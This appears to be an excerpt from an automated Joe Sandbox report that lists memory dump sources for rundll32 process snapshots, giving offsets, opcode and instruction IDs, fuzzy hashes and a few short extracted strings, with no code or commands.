                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 31132dff6298252d2d814fdb0e2dfdfe8c0c64b3ad6b736cf488c3c47c589705
                                                                                                                                                                                                                                                                                                • Instruction ID: 2e95caded98d4a4b428c807e170d03c8e1346d99e4d2c5ff1a59aa9dddeaf03b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31132dff6298252d2d814fdb0e2dfdfe8c0c64b3ad6b736cf488c3c47c589705
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0E5312043441BC3126768D01405E7FE6FFC63247151569E4C683241DE686D06C7A1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 590b191404a4723eea8fae05f2b617e10ebfe2ee9d5575730fcbf6376632ab72
                                                                                                                                                                                                                                                                                                • Instruction ID: 7309f9ff1a552283e6803ba1c7a990fb06dffb19b279419c017f2f26d3a77528
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 590b191404a4723eea8fae05f2b617e10ebfe2ee9d5575730fcbf6376632ab72
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9F06D316483849FD302DF5CD980C91BFE9EF5A21471581EAE888CB363D761ED16CBA0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0868d5c9404f59f290d67a93c8b9aca7d022a8861c19894091738777ec19200d
                                                                                                                                                                                                                                                                                                • Instruction ID: 6eccd6e9a07d12c2eb83fbb788ecb42105e61242a7922cd427cae74fa658c855
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0868d5c9404f59f290d67a93c8b9aca7d022a8861c19894091738777ec19200d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33E0D8363093A45FC79617BD642507ABFEACFC356130901AFD685C3242DA155C0683A2
Memory Dump Source
• Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4949bf79ea165b7cc062ca82df76faed2c741839d1a87d6282cea11fbeeb1653
                                                                                                                                                                                                                                                                                                • Instruction ID: ac09405ea88c3c3a9daacc6df5aa9ee1fee2d02d6b8f777665bfe25d3ea2343d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4949bf79ea165b7cc062ca82df76faed2c741839d1a87d6282cea11fbeeb1653
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DE02632B093945FEB628A75BC106DF7FECCB52121B1401EBE48CD7142E9665A45C3A1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 98b01c9e9e0d4f5b901c4c26d638f8ea3b923ca7333272aad4658c0a0813c55e
                                                                                                                                                                                                                                                                                                • Instruction ID: 47a1053e67f88c7abde55bcd4592e97c922ce5144c8dac555e7a0a0a8e70ea50
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98b01c9e9e0d4f5b901c4c26d638f8ea3b923ca7333272aad4658c0a0813c55e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00E0171614E3E00FDB03AF3C96B00D4BFA69D4321932D45DBC0C68E0A3D859998EC3AA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f8a04fcc56be5c3fe74c9e8662a4c9f1a10fcb0c7e1ff9129ab196bcbc6336fc
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a859231760951b4bfb7c989b3302f8618cbfe624a4ded65e8a565cf328201de
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8a04fcc56be5c3fe74c9e8662a4c9f1a10fcb0c7e1ff9129ab196bcbc6336fc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85E04F311092819FC3268B3CA904942FFFAEF8B32133A96EAE084C7116D6208C43C790
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0cfa8bbc40a4569aa7e3c07af7d9aef3d38a138ce3fc30ebf22d8fba1c64544d
                                                                                                                                                                                                                                                                                                • Instruction ID: 9506b5aa59be7aee4d80944574d47b3ada35262fdf5afa3b5699695bbeb36620
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cfa8bbc40a4569aa7e3c07af7d9aef3d38a138ce3fc30ebf22d8fba1c64544d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DE01272E0421ADF9F90DFA99D005AEBBF4AF49140B108579C519E7200E3319A11CFE1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9f299ec5c316ce6c74872ee07480e5ecdb03c1a71544baa911edc2f25b464eb3
                                                                                                                                                                                                                                                                                                • Instruction ID: 502d1827df77719cb06c227f96a4a5521128c15d1aca373f4dab9bb8bd810aa9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f299ec5c316ce6c74872ee07480e5ecdb03c1a71544baa911edc2f25b464eb3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3E0263270D2E44AEF4A47B974200A47FA2CA4204532804EAD2CBC3502C1068400C760
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1e7fa6dc33402a84129ffb78d23fa8a0ad2df712d5d65d1586c8a27722d52ef7
                                                                                                                                                                                                                                                                                                • Instruction ID: 107b745d9f598c5c0f74465c50342a36d6f87b9ed2b11eed47a6ea4e6119be8e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e7fa6dc33402a84129ffb78d23fa8a0ad2df712d5d65d1586c8a27722d52ef7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64E02B3320C2541FC3062B24EC159E67FFD9B5A62130840A7F841C7361CD626D21C7F0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 88f99843d839f21c94b02fb3e2f6bf575836bad29abbc2b8a98504886d9c7448
                                                                                                                                                                                                                                                                                                • Instruction ID: 2e76fd6dc6830a22e7c36b3d15f3c2fbf4d0fb7ccd624a8323837e74f00ff221
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88f99843d839f21c94b02fb3e2f6bf575836bad29abbc2b8a98504886d9c7448
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABE0C2313007185BC3147768E00955E7BDAFBC5764B40062DE44A83740CE79B9458BD5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0fc2608e8f54fdeb4fddd127875e4b86ea27ff00f63ca41d05930211ed6765d3
                                                                                                                                                                                                                                                                                                • Instruction ID: 85a001f4c08ecff464173c42912d4df9b47a2038f86cd978756a8edfaa2ef1c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc2608e8f54fdeb4fddd127875e4b86ea27ff00f63ca41d05930211ed6765d3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23E08C313002048FD300DF4CD880C81BBE9EF58210315809AF848CB312C762EC02CBA0
Memory Dump Source
• Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                • Opcode ID: e2086564231d39d5b7348abc6b6a7a8909eac3305700985937d9904833a2333b
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a01cfa6e7056615cbe96e8cb6b6064cf1dc1cd1169cb6d0238cd6dddf4dab71
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2086564231d39d5b7348abc6b6a7a8909eac3305700985937d9904833a2333b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12D05E74905209DFCB00DFB4EA05A5DBBF9EB44200B2196A69404D3224EA306F108BC0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b39f74d62886cc1349675d1c820487894433795d9a6c624e9663cd57c96c9468
                                                                                                                                                                                                                                                                                                • Instruction ID: fd42b94daf89fd0c870d9afd0a0bb3cd07952cb07af8f627d0239a8ec344f06c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b39f74d62886cc1349675d1c820487894433795d9a6c624e9663cd57c96c9468
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CD01231724618CFDF8CEBA8E55653577E9EB8860430088ACA90FC7341DF2AF802C691
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 30e2a52cc805db14efe13f145cadc85be56d2a932191a4332fb4aca8ba197b87
                                                                                                                                                                                                                                                                                                • Instruction ID: 8852bc75330cb5a187c575a93f3f2af58861646f397a09c9751e9f2e8b52842f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30e2a52cc805db14efe13f145cadc85be56d2a932191a4332fb4aca8ba197b87
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEB0927094530CAF8620DB99990185ABBACDA0A310F0001D9F90887320D976E91056D1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq$,oq$,oq$Hoq$`]pq$`]pq
                                                                                                                                                                                                                                                                                                • API String ID: 0-4238504177
                                                                                                                                                                                                                                                                                                • Opcode ID: ea6cf34d25bfab4031feff852929803cc12778179413c8a5ed30e789ef49079b
                                                                                                                                                                                                                                                                                                • Instruction ID: b4d24f4ad2f00c5039953669a6fb21cde7a624249d79debc17246b83294e6563
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea6cf34d25bfab4031feff852929803cc12778179413c8a5ed30e789ef49079b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20413B32F191248FEBE85B3ED41442D77EAEFCA62132500AAD106DB391CE25EC41C7E5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: \V#m
                                                                                                                                                                                                                                                                                                • API String ID: 0-1157912448
                                                                                                                                                                                                                                                                                                • Opcode ID: ee39edba72a380e13e52b8ff97b3fe85d6982edee9e5ce9c6812d2e2513fc604
                                                                                                                                                                                                                                                                                                • Instruction ID: 516d150e06e27e7936a11c3accbee9c4b43d2652efeabc13c2b57e69a6abb696
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee39edba72a380e13e52b8ff97b3fe85d6982edee9e5ce9c6812d2e2513fc604
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8B18E70E00219EFDB50CFA9C88579DBBF2BF88324F158539D815AB694EB74A841CB81
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 091fa52f447c63e35f7ea31773f141fd03d388d772c720e01068e9df857911f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 796719a05e2c001dff2da8e881b22c03273527b51b01321eb340e4a69812523c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091fa52f447c63e35f7ea31773f141fd03d388d772c720e01068e9df857911f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70B16170E00209EFDB54CFA8C8817ADBBF6AF88324F198539D415EB754EB74A845CB81
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                • Opcode ID: 901622a2a0a3bedc1d5cdd72cbe13d1150df6641b4972393ff3eced271e206c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 6cf1931b0d851be2496baae369b8496abf69389ae78eaa1ffc731d3d3a3c4232
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 901622a2a0a3bedc1d5cdd72cbe13d1150df6641b4972393ff3eced271e206c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551CD31B012098FCB15DF78D8516AEBBBAEBC9350F24807AE814D7364DA34AC41C7A0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: \V#m
                                                                                                                                                                                                                                                                                                • API String ID: 0-1157912448
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                • Instruction ID: 3577898fb5eae232fbd283b6650db5d9e49ec7f07a08615b882844234d757233
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16dd375ca31e80927484965d21d43e3584a3fe9e0e2fcfcf25bd47b7814b4922
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3001F7306492495FCB49AF7865762267FE9DFC12107051CBDC549CB3A2ED28D8458791
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.1708600248.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2d4d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 245931a2d41ca592e4c76337b2b49a1680684c0ce6f83fb89c6a3a9d8dc60f7c
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ca8a609a2e40640223b0151e9b96bb2ce4cc36f8899964b9c7c117aff771930
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 245931a2d41ca592e4c76337b2b49a1680684c0ce6f83fb89c6a3a9d8dc60f7c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73010C6140E3C09FD7128B258894B52BFB4EF53224F1DC5DBE9888F2A7C2699849C772
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.1708600248.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2d4d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 84705085f3eebdad47e9edb9bcbee9f086e96545752681d81f98ef84e5c41549
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a5808dce1e10b0af1839182d213633f83cec18fd13f2c767c834b9553d62b5f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84705085f3eebdad47e9edb9bcbee9f086e96545752681d81f98ef84e5c41549
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4901DB715083409BE7104B25CD84767BF99DF41324F28C52AED484F386CB79EC45C6B1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f9436fe1195aaccd2cc0440eebd7bdc54b9577f4073535b59cb7838b082e2c24
                                                                                                                                                                                                                                                                                                • Instruction ID: aa5f82b0cd20e0180439126e2cb572e990220c1cdc63feb393e82e4f61ce30e3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9436fe1195aaccd2cc0440eebd7bdc54b9577f4073535b59cb7838b082e2c24
